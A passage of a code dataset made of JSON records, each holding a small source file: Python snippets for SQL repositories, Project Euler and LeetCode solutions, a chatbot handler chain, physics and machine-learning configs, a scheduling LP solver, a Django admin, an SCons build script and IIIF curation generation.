update(merchant):\n sql = \"UPDATE merchants SET ( name, active ) = ( %s, %s ) WHERE id = %s\"\n values = [merchant.name, merchant.active, merchant.id]\n run_sql(sql, values)","sub_path":"repositories/merchant_repository.py","file_name":"merchant_repository.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"85632331","text":"'''\nCreated on Dec 29, 2015\n\n@author: rasmus\n'''\n\n\nimport numpy as np\nimport sys\n\nID_COUNTER = 1\nids_in_use = {}\n\n\ndef get_unique_id():\n global ID_COUNTER\n temp = ID_COUNTER\n ID_COUNTER += 1\n return temp\n\n\ndef old_get_unique_id():\n global ids_in_use\n new_id = np.random.randint(low=-sys.maxsize - 1,\n high=sys.maxsize)\n\n if new_id not in ids_in_use.keys():\n ids_in_use.setdefault(new_id, None)\n return new_id\n else:\n return get_unique_id()","sub_path":"rl_simulator/src/utilities/ids.py","file_name":"ids.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"52337233","text":"# Euler Problem Number 15\r\n# How many routes exist through a 20x20 grid (allowing only movements down and right)?\r\n\r\nimport math\r\n\r\n# n is the dimension of the square grid\r\ndef run(n):\r\n\tpaths = 1\r\n\r\n\tfor i in range(1, n + 1):\r\n\t\tpaths = paths * (n+i)//i\r\n\r\n\treturn paths\r\n\r\nif __name__ == \"__main__\":\r\n\r\n\tprint(run(20))\r\n","sub_path":"Python/problem_15.py","file_name":"problem_15.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"20516935","text":"import abc\nimport nltk\nfrom re import *\n\nfrom infopuls_crawler.question_answering.qa_model import get_model, get_answer\n\n\nclass UserRequest(object):\n \"\"\"Request data class\"\"\"\n\n chat_id = None\n session_id = None\n text = None\n\n def __init__(self, chat_id, session_id, text):\n self.chat_id = chat_id\n self.session_id = session_id\n self.text = text\n\n\nclass UserResponse(object):\n \"\"\"Response data class\"\"\"\n\n text = None\n\n def __init__(self, text):\n self.text = text\n\n\nclass Handler(object):\n\n def __init__(self, successor=None):\n self._successor = successor\n\n def process_request(self, input):\n result = self.handle(input)\n if result is not None:\n return result\n elif self._successor is not None:\n return self._successor.process_request(input)\n else:\n # cannot answer the question itself\n return UserResponse(\"Please contact our support.\")\n\n @abc.abstractmethod\n def handle(self, input):\n return None\n\n\nclass FilterIrrelevant(Handler):\n # set of irrelevant question templates\n bad_questions = [\n r\"fuck\"\n ]\n\n def handle(self, input):\n for pattern in self.bad_questions:\n if pattern in input.text:\n return UserResponse(\"The question is not appropriate.\")\n\n\nclass QuestionHandler(Handler):\n\n model = get_model()\n\n question_words = [\n \"what \",\n \"what's\",\n \"who\",\n \"who's\",\n \"where\",\n \"where's\",\n \"why \",\n \"why's \"\n \"whom \",\n \"which \",\n \"how \",\n \"when \"\n ]\n\n\n def handle(self, input):\n text = input.text\n\n user_questions = text\n\n best_sentence, score = get_answer(self.model, user_questions)\n print(\"sentence: \" + str(best_sentence) + \", score: \" + str(score))\n if best_sentence is None:\n return None\n else:\n return UserResponse(best_sentence)\n\n\ndef handlers():\n handler1 = QuestionHandler()\n handler2 = FilterIrrelevant(handler1)\n return handler2\n\n\ndef main():\n handler = handlers()\n print(handler.process_request(UserRequest(\"chat1\", \"session1\", \"s fsdtext\")).text)\n\n questions = \"What is Infopulse? How many employees the company use?\"\n sentences = questions.split()\n\n for sentence in sentences:\n print(sentence)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"infopuls_crawler/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"103287523","text":"#!/usr/bin/python3\n\"\"\"\nSay my name\nfunction that prints strings\nTake two strings\n\"\"\"\n\n\ndef say_my_name(first_name, last_name=\"\"):\n \"\"\"\n Return a string with the full name\n \"\"\"\n if not isinstance(first_name, str):\n raise TypeError(\"first_name must be a string\")\n if not isinstance(last_name, str):\n raise TypeError(\"last_name must be a string\")\n print(\"My name is {} {}\".format(first_name, last_name))\n","sub_path":"0x07-python-test_driven_development/3-say_my_name.py","file_name":"3-say_my_name.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"16469088","text":"from ChairClassExtension import Calculator\ndef main():\n print(\"------------Comfort Chair Hire - Hire Bookings-----------\\n\")\n Name = input(\"Please input Contact/Company name:\")\n print(\"PS - (Packer Stacker Chair - $5.00), HB - (High Back Plastic Chairs $10.50),L - (Lecture Chairs $15.00)\")\n Type = input(\"Prefered chair type :\")\n Number = int(input(\"Number of chair required :\"))\n Time = int(input(\"Please enter the duration of the hire (in days) :\"))\n print(\"------------Chair Hire Quotaion --------------------------\\n\")\n Example = Calculator(Name,Number,Time,Type.lower()) #name,number,time,type\n print(Example)\nmain()\n","sub_path":"Python3语法/面向对象/ChairInterface.py","file_name":"ChairInterface.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"588672436","text":"import FWCore.ParameterSet.Config as cms\n\nfrom FWCore.ParameterSet.VarParsing import VarParsing\noptions = VarParsing ('python')\noptions.setDefault('inputFiles','file:input.root')\noptions.setDefault('outputFile','output.root')\noptions.setDefault('maxEvents',-1)\noptions.parseArguments()\n\nprocess = cms.Process('TEST')\n\nprocess.source = cms.Source(\n \"PoolSource\",\n #fileNames = cms.untracked.vstring(options.inputFiles),\n #fileNames = cms.untracked.vstring(files[:4]),\n #fileNames = cms.untracked.vstring('/afs/cern.ch/user/b/bainbrid/work/public/5-full-chain/20-retrain-id/CMSSW_10_2_13/src/1-miniaod-from-crab'),\n fileNames = cms.untracked.vstring('/store/mc/RunIIAutumn18RECOBParking/BuToKJpsi_Toee_MuFilter_SoftQCDnonD_TuneCP5_13TeV-pythia8-evtgen/AODSIM/PUPoissonAve20_BParking_Bparking_102X_upgrade2018_realistic_v15-v1/110000/968D9C40-A196-C746-B16C-27E90DFC17DB.root'),\n #fileNames = cms.untracked.vstring('/store/data/Run2018A/ParkingBPH1/AOD/22Mar2019-v1/260005/A032FCE0-D492-D94E-9404-EF96EB3A84BB.root'), # data, AOD\n #fileNames = cms.untracked.vstring('/store/data/Run2018A/ParkingBPH1/MINIAOD/22Mar2019-v1/260002/54516928-947E-6140-A489-4E4099A593CF.root'), # data, MINIAOD\n secondaryFileNames = cms.untracked.vstring()\n )\n\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(options.maxEvents)\n )\n\nprocess.TFileService = cms.Service(\n \"TFileService\",\n fileName = cms.string(options.outputFile)\n )\n\nprocess.ntuplizer_seq = cms.Sequence()\n\nfrom PhysicsTools.SelectorUtils.tools.vid_id_tools import *\nswitchOnVIDElectronIdProducer(process,DataFormat.MiniAOD)\nfor idmod in ['RecoEgamma.ElectronIdentification.Identification.mvaElectronID_Fall17_noIso_V2_cff'] : \n setupAllVIDIdsInModule(process,idmod,setupVIDElectronSelection)\n\nprocess.electronMVAVariableHelper.srcMiniAOD = 'slimmedLowPtElectrons'\n#process.electronMVAVariableHelper.vertexCollectionMiniAOD = 'offlineSlimmedPrimaryVertices'\n#process.electronMVAVariableHelper.conversionsMiniAOD = 'gsfTracksOpenConversions'\n#process.electronMVAVariableHelper.beamSpotMiniAOD = 'offlineBeamSpot'\nprocess.ntuplizer_seq *= process.electronMVAVariableHelper\n\nprocess.electronMVAValueMapProducer.srcMiniAOD = 'slimmedLowPtElectrons'\nprocess.ntuplizer_seq *= process.electronMVAValueMapProducer\n\nprocess.load('LowPtElectrons.LowPtElectrons.IDFeatures_cfi')\nprocess.ntuplizer_seq *= process.features\n\nprocess.ntuplizer_path = cms.Path(process.ntuplizer_seq)\nprocess.schedule = cms.Schedule(process.ntuplizer_path)\n","sub_path":"run/ntuplizer_cfg.py","file_name":"ntuplizer_cfg.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"216279415","text":"# Copyright 2021 The NetKet Authors - All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport netket as nk\n\nimport jax.numpy as jnp\n\n\ndef mycb(step, logged_data, driver):\n logged_data[\"acceptance\"] = float(driver.state.sampler_state.acceptance)\n return True\n\n\ndef minimum_distance(x, sdim):\n\n n_particles = x.shape[0] // sdim\n x = x.reshape(-1, sdim)\n\n distances = (-x[jnp.newaxis, :, :] + x[:, jnp.newaxis, :])[\n jnp.triu_indices(n_particles, 1)\n ]\n return jnp.linalg.norm(distances, axis=1)\n\n\ndef potential(x):\n dis = minimum_distance(x, 1)\n\n dis = jnp.sin(jnp.pi / L * dis) ** 2\n beta = 2.0\n g = (jnp.pi / L) ** 2 * beta * (beta - 1)\n\n return jnp.sum(g / dis)\n\n\nL = 15.0\n\nhilb = nk.hilbert.Particle(N=10, L=(L,), pbc=True)\n\nsab = nk.sampler.SingleMetropolisGaussian(hilb, sigma=1.0, n_chains=16)\n\nmodel = nk.models.DeepSet(\n k=4,\n L=L,\n sdim=1,\n layers_phi=2,\n layers_rho=3,\n features_phi=(16, 16),\n features_rho=(16, 16, 1),\n)\n# model = nk.models.Gaussian()\nekin = nk.operator.KineticEnergy(hilb, mass=1.0)\npot = nk.operator.PotentialEnergy(hilb, potential)\nha = ekin + pot\n\nvs = nk.vqs.MCState(sab, model, n_samples=10**4, n_discard_per_chain=2000)\n\"\"\"\nimport flax\nwith open(r'/home/gabriel/Documents/PhD/netket/Examples/Continuous/CS/CS_10_1d.mpack', 'rb') as file:\n vs.variables = flax.serialization.from_bytes(vs.variables, file.read())\n\"\"\"\nop = nk.optimizer.Sgd(0.01)\nsr = nk.optimizer.SR(diag_shift=0.01)\n\ngs = nk.VMC(ha, op, sab, variational_state=vs) # , preconditioner=sr)\ngs.run(n_iter=100, callback=mycb, out=\"test\")\n","sub_path":"Examples/Continuous/CS/CS.py","file_name":"CS.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"597998593","text":"# Copyright 2020,2021 Sony Corporation.\n# Copyright 2021 Sony Group Corporation.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport pytest\n\nfrom nnabla_rl.environment_explorer import _is_end_of_episode\n\n\nclass TestEnvironmentExplorer(object):\n @pytest.mark.parametrize(\"done\", [True, False])\n @pytest.mark.parametrize(\"timelimit\", [True, False])\n @pytest.mark.parametrize(\"timelimit_as_terminal\", [True, False])\n def test_is_end_of_episode(self, done, timelimit, timelimit_as_terminal):\n end_of_episode = _is_end_of_episode(done, timelimit, timelimit_as_terminal)\n if not done:\n assert end_of_episode is False\n else:\n # All the case that done == True\n if timelimit and timelimit_as_terminal:\n assert end_of_episode is True\n elif timelimit and not timelimit_as_terminal:\n assert end_of_episode is False\n elif not timelimit:\n assert end_of_episode is True\n else:\n raise RuntimeError\n\n\nif __name__ == '__main__':\n pytest.main()\n","sub_path":"tests/test_environment_explorer.py","file_name":"test_environment_explorer.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"516989037","text":"from __future__ import unicode_literals\n\nfrom django.contrib import admin\n'''\nfrom .models import Register\nfrom .models import Volunteer\nfrom .models import BookNow\n'''\nfrom app.models import Register,Volunteer,BookNow\n\n@admin.register(Register)\nclass AppAdmin(admin.ModelAdmin):\n\tlist_display = ('username','first_name', 'created_at', 'modified_at',)\n\n@admin.register(Volunteer)\nclass AppVolunteer(admin.ModelAdmin):\n\tlist_display = ('username','first_name', 'created_at', 'modified_at',)\n\n@admin.register(BookNow)\nclass WebAdmin(admin.ModelAdmin):\n\tlist_display = ('first_name', 'last_name', 'created_at', 'modified_at',)\n'''\nadmin.site.register(Register)\nadmin.site.register(Volunteer)\nadmin.site.register(BookNow)\n'''\n","sub_path":"app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"361504324","text":"import multiprocessing\nfrom collections import defaultdict\n\nfrom pulp import *\n\nfrom instance_reader import *\n\n\nclass GurobiSolver:\n\n def __init__(self):\n import gurobipy as gp\n self.m = gp.Model(\"mip1\")\n\n def int_var(self, min, max, name):\n from gurobipy import GRB\n return self.m.addVar(lb=min, ub=max, vtype=GRB.INTEGER, name=name)\n\n def float_var(self, min, max, name):\n from gurobipy import GRB\n return self.m.addVar(lb=min, ub=max, vtype=GRB.CONTINUOUS, name=name)\n\n def constraint(self, what, name):\n return self.m.addConstr(what, name=name)\n\n def solve(self, time_limit):\n # self.m.Params.MIPGap = 0.01\n self.m.Params.TimeLimit = time_limit\n return self.m.optimize()\n\n def minimize(self, what):\n from gurobipy import GRB\n return self.m.setObjective(what, GRB.MINIMIZE)\n\n def value(self, v):\n return v.X\n\n def set_default_value(self, v, val):\n v.start = val\n\n def get_objective_value(self):\n return self.m.getObjective().getValue()\n\n @property\n def mip_gap(self):\n return self.m.MIPGap\n\n @property\n def mip_gap_abs(self):\n return self.m.getObjective().getValue()-self.m.ObjBound\n\nclass SolverInterface:\n\n def __init__(self):\n self.m = LpProblem(\"Kostwein\", LpMinimize)\n\n def int_var(self, min, max, name):\n return LpVariable(name, min, max, cat=\"Integer\")\n\n def constraint(self, what, name=None):\n assert len(name) <= 255, name\n self.m.addConstraint(what, name)\n\n def solve(self, solver=None):\n return self.m.solve(solver)\n\n def minimize(self, what):\n self.m += what\n\n def value(self, v):\n return v.varValue\n\n def set_default_value(self, v, val):\n v.setInitialValue(val)\n\n def get_objective_value(self):\n return value(self.m.ObjBound)\n\n\ndef solve_with_lp(task_list: List[Task], machine_list: List[Machine], job_list: List[Job], setup, cm: CapacityManager2, solver_backend=None, obj_dv=0):\n from time import time\n start = time()\n solver = GurobiSolver()\n\n machine_time_task_sum = defaultdict(lambda: defaultdict(lambda: []))\n warm_start = 'warmStart' in setup and setup['warmStart']\n\n # every task(part) is started exactly once\n for task in task_list:\n task.solver_vars_per_timestep = {}\n # start date in real time: consecutive constraints\n task.solver_assigned_start = 0\n # start date in \"machine time\" (non-working days not computed): no interruption of task\n task.solver_assigned_start_machine_time = 0\n job_length = len(task.job.tasks) + sum([t.free_days_before for t in task.job.tasks])\n for t in range(task.earliest_start, task.job.tasks[-1].result_processing_day + 10 - task.min_days_after):\n if task.machine.capacity(t, cm):\n v = solver.int_var(0, 1, f'Task {task.id} start at {t}')\n if warm_start:\n solver.set_default_value(v, 1 if task.result_processing_day == t else 0)\n machine_time_task_sum[t][task.machine.id].append({\n 'var': v,\n 'sum': task.length,\n 'machine': task.machine,\n 't': t,\n })\n task.solver_vars_per_timestep[t] = v\n task.solver_assigned_start += v * t\n task.solver_assigned_start_machine_time += v * task.machine.virtual_t(t, cm)\n solver.constraint(sum(task.solver_vars_per_timestep.values()) == 1, name=f'Perform task {task.id} once')\n\n # no more than 24 hrs of work on each day\n for t1 in machine_time_task_sum.values():\n for t in t1.values():\n m: Machine = t[0]['machine']\n time_step = t[0]['t']\n solver.constraint(sum([a['sum'] * a['var'] for a in t]) <= m.capacity(time_step, cm),\n f'Max work capaciy for machine {m.id} and time step {time_step}')\n\n # consecutive constraints\n for job in job_list:\n last: Task = None\n for task in job.tasks:\n if last is not None:\n solver.constraint(\n last.solver_assigned_start <= task.solver_assigned_start - 1 - task.free_days_before,\n name=f'Consecutive 1 for task {task.id}')\n if task.directly_after_last:\n assert last is not None\n solver.constraint(\n last.solver_assigned_start_machine_time + 1 == task.solver_assigned_start_machine_time,\n name=f'Consecutive 2 for task {task.id}')\n last = task\n\n # compute delay\n for job in job_list:\n if len(job.tasks) > 0:\n # assert not job.tasks[-1].machine.external\n big_number = 3000\n job.solver_delay = solver.int_var(0, big_number, f'Job {job.id} delay')\n if warm_start:\n solver.set_default_value(job.solver_delay, job.result_delay)\n solver.constraint(job.solver_delay >= job.tasks[-1].solver_assigned_start - job.deadline,\n name=f'delay for job {job.id}')\n\n job.solver_has_delay = solver.int_var(0, 1, f'Job {job.id} delay')\n if warm_start:\n solver.set_default_value(job.solver_has_delay, 1 if job.result_delay > 0 else 0)\n solver.constraint(job.solver_has_delay * big_number >= job.solver_delay, f'has delay for job {job.id}')\n else:\n job.solver_has_delay = 0\n job.solver_delay = 0\n\n project_weight = {a['project']: a['jobWeight'] for a in setup['objective']['projects']}\n default_job_weight = setup['objective']['jobWeight']\n solver.minimize(\n sum([(project_weight[job.project] if job.project in project_weight else default_job_weight) *\n setup['objective']['penaltyPerDay'] * job.solver_delay for job in job_list])\n + sum([(project_weight[job.project] if job.project in project_weight else default_job_weight) *\n setup['objective']['oneTimePenalty'] * job.solver_has_delay for job in job_list])\n + obj_dv\n )\n solver.solve(time_limit=setup['timeLimit'])\n\n machine_days = defaultdict(lambda: defaultdict(lambda: 0))\n\n for task in task_list:\n for t, v in task.solver_vars_per_timestep.items():\n if int(solver.value(v)) == 1:\n # task.result_processing_day = t\n machine_days[t][task.machine.id] += task.length\n\n from presolver import perf_measures\n p = perf_measures(job_list)\n p['obj'] = solver.get_objective_value()\n print('Solve objective', solver.get_objective_value())\n p['termination_time'] = time() - start\n p['mip_gap'] = solver.mip_gap\n p['mip_gap_abs'] = solver.mip_gap_abs\n p['num_vars'] = solver.m.getAttr('NumVars')\n p['num_constrs'] = solver.m.getAttr('NumConstrs')\n return dict(machine_days=machine_days, **p)\n","sub_path":"lp_solver.py","file_name":"lp_solver.py","file_ext":"py","file_size_in_byte":6958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"101903077","text":"#file: Coretech/Code/Sloth/STestbedApplication/SConscript\n\n\n###########################################\n# import\n\nimport os\n\nImport( \"env\" )\nenv = env.Clone()\n\n\n###########################################\n# local varaibles\n\ntranslationUnitName = 'STestbedApplication'\ntranslationUnitProjectName = translationUnitName + env['MSVSPROJECTSUFFIX']\ntranslationUnitSolutionName = translationUnitName + env['MSVSSOLUTIONSUFFIX']\n\n#src files \nsourceFileDict = {\n 'DATA' : [\n 'Data/vertex_shader.txt',\n 'Data/vertex_shader_lights.txt',\n ],\n '' : [\n 'STestbedApplication.cpp',\n 'STestbedApplication.h',\n 'SConscript'\n ],\n }\n\n######################################\n#adjust our env\n\nif env.get( 'TARGET_DEBUG', False ):\n env[ 'PDB' ] = translationUnitName + '.pdb'\n\nenv.Append( TARGET_DEFINES = [ '_CONSOLE' ] )\n\n######################################\n#build exe alias( 'build' )\n\nbuild = env.BuildMsvs(\n target = translationUnitName + '.exe',\n source = [ \n translationUnitSolutionName,\n \"${BUILD_DIR}/Code/Lib/Hubris.Lib\",\n \"${BUILD_DIR}/Code/Lib/Pride.Lib\",\n \"${BUILD_DIR}/Code/Lib/Sloth.Lib\",\n \"${BUILD_DIR}/Code/Lib/Lust.Lib\",\n ],\n sourceFile = env.File( '#Code/Sloth/STestbedApplication/' + translationUnitSolutionName ),\n projectName = translationUnitName,\n ) \nenv.Alias( 'build', build )\n\n######################################\n#build project\n\nif 'CreateMsvsProject' in env['TOOLS']:\n project = env.CreateMsvsProject(\n target = translationUnitProjectName,\n source = [\n env.File( '${CODE_DIR}/Sloth/STestbedApplication/Sconscript' ),\n ], \n sourceProjectFiles = sourceFileDict,\n additionalIncludeDirectories = [ \"..\\\\..\", ], \n additionalDependencies = [ \n \"Hubris.lib\", \n \"Envy.lib\",\n \"Pride.lib\",\n \"Sloth.lib\",\n \"Lust.lib\",\n \"TinyXml.lib\",\n \"opengl32.lib\",\n ],\n additionalLibraryDirectories = [ \n env.Dir( '${BUILD_DIR}/Code/Lib' ).abspath,\n env.Dir( '${BUILD_DIR}/ThirdParty/Lib' ).abspath,\n ],\n projectType = 'Win32Proj',\n buildWindowApp = True,\n buildBase = os.path.join( \"..\", \"..\", \"..\", env.Dir( '.' ).path ),\n )\n Clean( project, env.File( translationUnitProjectName ).srcnode() )\n env.Default( project )\n\n######################################\n#build solution (default)\n\nif 'CreateMsvsSolution' in env['TOOLS']:\n solution = env.CreateMsvsSolution(\n target = translationUnitSolutionName,\n source = [\n translationUnitProjectName,\n ],\n sourceSolutionDependency = { \n translationUnitProjectName : [\n \"Hubris.vcproj\",\n \"Envy.vcproj\",\n \"Pride.vcproj\",\n \"Lust.vcproj\",\n \"Sloth.vcproj\",\n ],\n \n \"..\\\\..\\\\Hubris\\\\Hubris.vcproj\" : [\n \"TinyXml.vcproj\",\n ],\n \n \"..\\\\..\\\\Envy\\\\Envy.vcproj\" : [\n ],\n \n \"..\\\\..\\\\Pride\\\\Pride.vcproj\" : [\n ],\n\n \"..\\\\..\\\\Lust\\\\Lust.vcproj\" : [\n ],\n\n \"..\\\\Sloth.vcproj\" : [\n ],\n \n \"..\\\\..\\\\..\\\\ThirdParty\\\\TinyXml\\\\TinyXml.vcproj\" : [\n ], \n },\n solutionItemArray = [\n \"SConscript\",\n \"..\\\\..\\\\..\\\\SolutionItems\\\\code_standard.txt\", \n \"..\\\\..\\\\..\\\\SolutionItems\\\\todo.txt\", \n \"..\\\\..\\\\..\\\\SolutionItems\\\\plan.txt\", \n \"..\\\\..\\\\..\\\\SolutionItems\\\\glsl_vertex_shader_quick_ref.txt\", \n ],\n\n )\n env.Clean( solution, env.File( translationUnitSolutionName ).srcnode() ) \n env.Default( solution )\n \n#end file","sub_path":"Sloth/STestbedApplication/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":3508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"137651821","text":"import pymongo\nfrom pymongo import MongoClient\nimport string\nimport random\nimport sys\n\n#connect to the mongod service\nclient = MongoClient('mongodb://localhost:27017')\n#switch to the database containing sensor data\ndb = client[\"sensors\"]\n\ncity = raw_input(\"city: \") #add in the city of the new sensor\nstate = raw_input(\"2 letter state abbreviation: \") #and its city\nstate = state.upper() #make sure the state is upper case\n\ncolls = db.collection_names(include_system_collections=False)\n\nsensorDict = {\"sen\" + str(len(colls)+1): (city, state)} #make dictionary entry for new sensor\n\nfor key, value in sensorDict.iteritems(): #go through all updates\n\tcollect = db[key] #make new collection for the new sensor coming online\n\tprint(collect.count()) #see if the collecion previously existed (doesn't create duplicate if it does)\n\tif collect.count() == 0:\n\t\tpost = {\"location\": key,\n\t\t\t\t\"city\": value[0],\n\t\t\t\t\"state\": value[1]}\n\t\tcollect.insert_one(post) #insert the locatoin document","sub_path":"server/addDevice.py","file_name":"addDevice.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"48308010","text":"import sys\nimport urllib\nimport json\nimport argparse\nimport urllib.request\nimport csv\nimport os\nimport yaml\nimport glob\nfrom PIL import Image\n\nwith open('../docs/iiif/amami/manifest.json') as f:\n df = json.load(f)\n\ncanvases = df[\"sequences\"][0][\"canvases\"]\n\nmembers = []\n\nfor i in range(len(canvases)):\n canvas_id = canvases[i][\"@id\"]\n ys = [[1600, 2400, 3150, 3200 + 800], [4500, 5250, 6000, 6000 + 800]]\n \n if i % 2 == 0:\n xs = [770, 2700, 2700 + 1900]\n \n else:\n xs = [1000, 2800, 2800 + 1900]\n\n r = 2400 / 5457\n\n for y in ys:\n\n for j in range(0, len(xs) - 1):\n x1 = xs[len(xs) - j - 2]\n x2 = xs[len(xs) - j - 1]\n w = x2 - x1\n\n for k in range(len(y) - 1):\n y1 = y[k]\n y2 = y[k + 1]\n h = y2 - y1\n\n member_id = canvas_id+\"#xywh=\"+str(int(x1 * r))+\",\"+str(int(y1 * r))+\",\"+str(int(w*r))+\",\"+str(int(h*r))\n members.append({\n \"@id\": member_id,\n \"@type\": \"sc:Canvas\",\n \"label\": \"[\"+str(i+1)+\"]\",\n \"description\": \"\"\n })\n\ncuration = {\n \"@context\": [\n \"http://iiif.io/api/presentation/2/context.json\",\n \"http://codh.rois.ac.jp/iiif/curation/1/context.json\"\n ],\n \"@type\": \"cr:Curation\",\n \"@id\": \"https://mp.ex.nii.ac.jp/api/curation/json/aaa5d585-3cd2-4651-ba98-71769b028e19\",\n \"label\": \"Curating list\",\n \"selections\": [\n {\n \"@id\": \"https://mp.ex.nii.ac.jp/api/curation/json/aaa5d585-3cd2-4651-ba98-71769b028e19/range1\",\n \"@type\": \"sc:Range\",\n \"label\": \"Manual curation by IIIF Curation Viewer\",\n \"members\": members,\n \"within\": {\n \"@id\": \"https://raw.githubusercontent.com/nakamura196/amami/master/docs/iiif/amami/manifest.json\",\n \"@type\": \"sc:Manifest\",\n \"label\": \"奄美大島\"\n }\n }\n ]\n}\n\nfw = open(\"../docs/curation/block.json\", 'w')\njson.dump(curation, fw, ensure_ascii=False, indent=4, sort_keys=True, separators=(',', ': '))\n","sub_path":"src/createCuration.py","file_name":"createCuration.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"273610010","text":"__author__ = 'cissnei'\n\nimport tensorflow as tf\n\nnode1 = tf.constant(3.0, tf.float32)\nnode2 = tf.constant(4.0, tf.float32)\nnode3 = tf.add(node1, node2)\n\nprint(\"node1: \", node1) # it prints just structure of tensor\n\nsess=tf.Session()\nprint(sess.run([node1, node2]))\nprint(sess.run(node3))\n\n#Placeholder\n\na = tf.placeholder(tf.float32)\nb = tf.placeholder(tf.float32)\nadder_node = a + b # same as 'add(a,b)'\n\nprint (sess.run(adder_node, feed_dict ={a:3.0, b: 4.5}))\nprint (sess.run(adder_node, feed_dict={a:[1,3], b:[2,5]}))\n\n\n","sub_path":"ComputationalGraph.py","file_name":"ComputationalGraph.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"604823464","text":"#!/usr/bin/env python\n# Exit 1 if wheel has a bad ver\nimport sys\nfrom pathlib import Path\n\nPACKAGE_NAME = \"scikit_misc\"\nNULL_VERSION = \"0.0.0\"\nBAD_PFX = f\"{PACKAGE_NAME}-{NULL_VERSION}\"\n\nWHEELS = Path(\"wheelhouse/\").glob(\"*.whl\")\nDISTS = Path(\"dist/\").glob(\"*.tar.gz\")\n\n\ndef wheels_have_good_version() -> bool:\n \"\"\"\n Return True if there is a wheel with a null version\n \"\"\"\n return all(not s.name.startswith(BAD_PFX) for s in WHEELS)\n\n\ndef sdists_have_good_version() -> bool:\n \"\"\"\n Return True if there is an sdist with a null version\n \"\"\"\n return all(not s.name.startswith(BAD_PFX) for s in DISTS)\n\n\ndef have_good_versions() -> bool:\n \"\"\"\n Return True if any wheel or dist has a null version\n\n A null version is \"0.0.0\"\n \"\"\"\n return wheels_have_good_version() and sdists_have_good_version()\n\n\nif __name__ == \"__main__\":\n if not have_good_versions():\n sys.exit(1)\n","sub_path":".github/utils/check_package_version.py","file_name":"check_package_version.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"608237165","text":"\"\"\"\n// Source: https://leetcode.com/problems/delete-node-in-a-linked-list/\n// Author: Nan Wei\n// Date: 2019-04-03\n\n/* Write a function to delete a node (except the tail) in a singly linked list, given only access to that node.\n *\n * Given linked list -- head = [4,5,1,9]\n * Example 1:\n * Input: head = [4,5,1,9], node = 5\n * Output: [4,1,9]\n * Explanation: You are given the second node with value 5, the linked list should become 4 -> 1 -> 9 after calling your function.\n \n * Example 2:\n * Input: head = [4,5,1,9], node = 1\n * Output: [4,5,9]\n * Explanation: You are given the third node with value 1, the linked list should become 4 -> 5 -> 9 after calling your function.\n \n\n * Note:\n * The linked list will have at least two elements.\n * All of the nodes' values will be unique.\n * The given node will not be the tail and it will always be a valid node of the linked list.\n * Do not return anything from your function\n\n/* Idea: change the value in the current node to the same as the next node, then modify the link to point to the node after the next link (next of the next)\n */\n\"\"\"\n\nclass Solution:\n def deleteNode(self, node):\n node.val = node.next.val\n node.next = node.next.next\n\n# Dumber idea that I had initially - copy the values forward until the second last node, at which point we change its next to None in order to shorten the link length by 1\nclass Solution:\n def deleteNode(self, node):\n \"\"\"\n :type node: ListNode\n :rtype: void Do not return anything, modify node in-place instead.\n \"\"\"\n while node.next.next:\n node.val = node.next.val\n node = node.next\n node.val = node.next.val\n node.next = None\n","sub_path":"237_delete_node_in_a_linked_list/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"62427645","text":"#!/usr/bin/env python\n\nimport os\nfrom environment import common, docker\n\n# ===== input 